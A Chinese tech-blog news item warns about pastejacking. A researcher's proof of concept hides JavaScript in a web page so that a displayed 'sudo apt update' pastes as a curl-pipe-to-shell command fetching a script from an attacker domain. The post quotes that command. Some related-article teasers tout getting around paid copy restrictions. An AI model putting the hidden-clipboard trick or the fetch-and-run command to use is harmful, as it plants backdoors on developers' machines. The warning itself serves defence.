从陌生网页上复制/贴上命令列要小心被黑

boyanx2周前技术教程4

安全研究人员警告,HTML页面上的命令列可能藏匿恶意程序码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门。

复制粘贴要当心,病毒代码在执行

一名安全研究人员Gabriel Friedlander近日警告,随手从网络上复制与贴上(Copy/Paste)命令列时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。

Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu作业系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:]
//attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。

这是因为Friedlander在此一HTML页面上藏匿了JavaScript程序码,而让开发者眼见的文字与贴上之后所呈现的内容完全不同。

Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份程序码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。

标签: css禁止复制

相关文章

17个CSS知识点整理

微信ID:WEB_wysj(点击关注) ◎ ◎ ◎ ◎ ◎◎◎◎◎一┳═┻︻▄(点击页底“阅读原文”下载源代码)● ● ●1、对WEB标准以及W3C的理解与认识标签闭合、标签小写、不乱嵌套、提高搜索机...

学会这5个方法,全网任意免费复制,告别付费复制

我们在网上搜索资料的时候,经常需要把有用的内容复制下来。但是,并不是所有的网站内容都可以复制、粘贴,有时候复制内容会弹出开通VIP,立即解锁文本内容。要么就是提示要付费,才能够复制内容。在这种情况下,...

教你怎么破解百度文库复制限制

不管是工作,还是学习,经常需要在网上查找一些资料,但是当找到的文档内容不能直接复制粘贴怎么办呢?很多人首先想到的办法,应该是用QQ截图提取文字,或者通过网页源代码查看!这里教你1个更高级的破解妙招,学...

抓狂!DeepSeek复制粘贴到Word 格式全乱套,5招彻底解决!

“明明在DeepSeek里排版得好好的,一复制粘贴到Word里,格式咋就就全乱套了?”你是不是也遇到过这种情况:标题没了加粗,字号全变了;出现了一堆“**”、“###”、“---”等各种符号。列表项缩...

网页文字禁止复制,一招教你解决

经常在网上查找资料时,看到有用的内容,就会想要复制文字。但是在复制文字的时候,又会遇到许多问题,也就是复制不了文字。看到这种情况,一般人就会付费或者登录进行文字复制,之前大多数人会用冰点文库,冰点软件...

如何用Markdown标注文档提升产品工作效能

本文将从设计师的视角出发,深入探讨 Markdown 标注文档的优势、典型结构以及如何通过它提升产品工作效能,帮助设计师更好地掌握这一工具,减少沟通成本,强化设计话语权,并在远程协作和快速迭代的项目中...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。